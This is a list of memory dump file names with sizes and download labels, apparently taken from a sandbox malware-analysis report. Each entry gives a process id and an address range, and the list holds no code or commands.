memory/3452-268-0x00000000050E0000-0x00000000050F2000-memory.dmp

Filesize
72KB

Download
memory/3528-191-0x00000000049E0000-0x0000000004A56000-memory.dmp

Filesize
472KB

Download
memory/3528-212-0x0000000004980000-0x000000000499E000-memory.dmp

Filesize
120KB

Download
memory/3528-346-0x00000000028C0000-0x000000000296B000-memory.dmp

Filesize
684KB

Download
memory/3528-222-0x00000000050F0000-0x0000000005694000-memory.dmp

Filesize
5.6MB

Download
memory/3528-350-0x0000000002A20000-0x0000000002AB2000-memory.dmp

Filesize
584KB

Download
memory/3528-345-0x0000000002730000-0x000000000280F000-memory.dmp

Filesize
892KB

Download
memory/3528-348-0x0000000002970000-0x0000000002A15000-memory.dmp

Filesize
660KB

Download
memory/3528-344-0x0000000000C80000-0x0000000000DCC000-memory.dmp

Filesize
1.3MB

Download
memory/3528-186-0x0000000000180000-0x00000000001F2000-memory.dmp

Filesize
456KB

Download
memory/3636-201-0x0000000000E90000-0x0000000000EAA000-memory.dmp

Filesize
104KB

Download
memory/3640-305-0x0000000007A90000-0x0000000007A9A000-memory.dmp

Filesize
40KB

Download
memory/3640-221-0x0000000005760000-0x0000000005782000-memory.dmp

Filesize
136KB

Download
memory/3640-310-0x0000000007C80000-0x0000000007D16000-memory.dmp

Filesize
600KB

Download
memory/3640-297-0x00000000080C0000-0x000000000873A000-memory.dmp

Filesize
6.5MB

Download
memory/3640-225-0x0000000006030000-0x0000000006096000-memory.dmp

Filesize
408KB

Download
memory/3640-174-0x0000000005800000-0x0000000005E28000-memory.dmp

Filesize
6.2MB

Download
memory/3640-317-0x0000000007D30000-0x0000000007D38000-memory.dmp

Filesize
32KB

Download
memory/3640-169-0x0000000005190000-0x00000000051C6000-memory.dmp

Filesize
216KB

Download
memory/3640-288-0x000000006E4E0000-0x000000006E52C000-memory.dmp

Filesize
304KB

Download
memory/3640-299-0x0000000007750000-0x000000000776A000-memory.dmp

Filesize
104KB

Download
memory/3640-316-0x0000000007D40000-0x0000000007D5A000-memory.dmp

Filesize
104KB

Download
memory/3640-248-0x00000000057B0000-0x00000000057CE000-memory.dmp

Filesize
120KB

Download
memory/3640-234-0x00000000060A0000-0x0000000006106000-memory.dmp

Filesize
408KB

Download
memory/3640-313-0x0000000007C40000-0x0000000007C4E000-memory.dmp

Filesize
56KB

Download
memory/3640-286-0x0000000006C90000-0x0000000006CC2000-memory.dmp

Filesize
200KB

Download
memory/3640-290-0x0000000006C50000-0x0000000006C6E000-memory.dmp

Filesize
120KB

Download
memory/3840-281-0x00000000023C0000-0x0000000002409000-memory.dmp

Filesize
292KB

Download
memory/3840-280-0x0000000000B38000-0x0000000000B61000-memory.dmp

Filesize
164KB

Download
memory/3840-283-0x0000000000400000-0x00000000007A0000-memory.dmp

Filesize
3.6MB

Download
memory/3840-335-0x0000000000400000-0x00000000007A0000-memory.dmp

Filesize
3.6MB

Download
memory/3840-334-0x0000000000B38000-0x0000000000B61000-memory.dmp

Filesize
164KB

Download
memory/4264-229-0x0000000000650000-0x0000000000658000-memory.dmp

Filesize
32KB

Download
memory/4264-236-0x00007FF963320000-0x00007FF963DE1000-memory.dmp

Filesize
10.8MB

Download
memory/4264-331-0x00007FF963320000-0x00007FF963DE1000-memory.dmp

Filesize
10.8MB

Download
memory/4372-202-0x00000000007B0000-0x0000000000820000-memory.dmp

Filesize
448KB

Download
memory/4488-349-0x0000000003E10000-0x0000000004064000-memory.dmp

Filesize
2.3MB

Download
memory/4864-151-0x000000006FE40000-0x000000006FFC6000-memory.dmp

Filesize
1.5MB

Download
memory/4864-146-0x000000006B440000-0x000000006B4CF000-memory.dmp

Filesize
572KB

Download
memory/4864-156-0x000000006B280000-0x000000006B2A6000-memory.dmp

Filesize
152KB

Download
memory/4864-149-0x000000006FE40000-0x000000006FFC6000-memory.dmp

Filesize
1.5MB

Download
memory/4864-160-0x0000000064940000-0x0000000064959000-memory.dmp

Filesize
100KB

Download
memory/4864-147-0x000000006B440000-0x000000006B4CF000-memory.dmp

Filesize
572KB

Download
memory/4864-159-0x000000006FE40000-0x000000006FFC6000-memory.dmp

Filesize
1.5MB

Download
memory/4864-256-0x000000006B280000-0x000000006B2A6000-memory.dmp

Filesize
152KB

Download
memory/4864-157-0x000000006B440000-0x000000006B4CF000-memory.dmp

Filesize
572KB

Download
memory/4864-260-0x000000006B440000-0x000000006B4CF000-memory.dmp

Filesize
572KB

Download
memory/4864-263-0x000000006FE40000-0x000000006FFC6000-memory.dmp

Filesize
1.5MB

Download
memory/4864-154-0x000000006B280000-0x000000006B2A6000-memory.dmp

Filesize
152KB

Download
memory/4864-266-0x0000000064940000-0x0000000064959000-memory.dmp

Filesize
100KB

Download
memory/4864-153-0x000000006B280000-0x000000006B2A6000-memory.dmp

Filesize
152KB

Download
memory/4864-152-0x000000006FE40000-0x000000006FFC6000-memory.dmp

Filesize
1.5MB

Download
memory/4864-148-0x000000006B440000-0x000000006B4CF000-memory.dmp

Filesize
572KB

Download
memory/4864-150-0x000000006FE40000-0x000000006FFC6000-memory.dmp

Filesize
1.5MB

Download
memory/4864-158-0x0000000000F70000-0x0000000000FFF000-memory.dmp

Filesize
572KB

Download
memory/4872-238-0x0000000000400000-0x0000000000414000-memory.dmp

Filesize
80KB

Download
memory/4872-250-0x0000000000400000-0x0000000000414000-memory.dmp

Filesize
80KB

Download
memory/4872-230-0x0000000000400000-0x0000000000414000-memory.dmp

Filesize
80KB

Download
memory/4904-277-0x0000000000400000-0x0000000000422000-memory.dmp

Filesize
136KB

Download
memory/5164-359-0x0000000000400000-0x00000000004FC000-memory.dmp

Filesize
1008KB

Download
memory/5216-364-0x0000000000400000-0x000000000089E000-memory.dmp

Filesize
4.6MB

Download
memory/5296-378-0x00000000007A0000-0x00000000007D2000-memory.dmp

Filesize
200KB

Download
memory/5296-365-0x00000000007A0000-0x00000000007D2000-memory.dmp

Filesize
200KB

Download
memory/5296-390-0x00000000007A0000-0x00000000007D2000-memory.dmp

Filesize
200KB

Download
memory/8332-392-0x0000000140000000-0x0000000140604000-memory.dmp

Filesize
6.0MB

Download
memory/9776-386-0x0000000000400000-0x000000000089E000-memory.dmp

Filesize
4.6MB

Download
memory/9912-384-0x0000000000400000-0x00000000004FC000-memory.dmp

Filesize
1008KB

Download
memory/10204-404-0x0000000000790000-0x00000000007C2000-memory.dmp

Filesize
200KB

Download